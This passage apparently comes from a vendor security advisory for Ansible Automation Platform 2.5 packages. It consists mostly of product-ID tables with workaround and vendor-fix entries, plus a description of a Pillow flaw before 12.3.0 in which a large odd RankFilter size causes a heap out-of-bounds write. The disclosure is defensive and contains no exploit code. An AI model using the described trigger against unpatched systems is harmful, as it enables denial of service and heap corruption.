| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — | ||
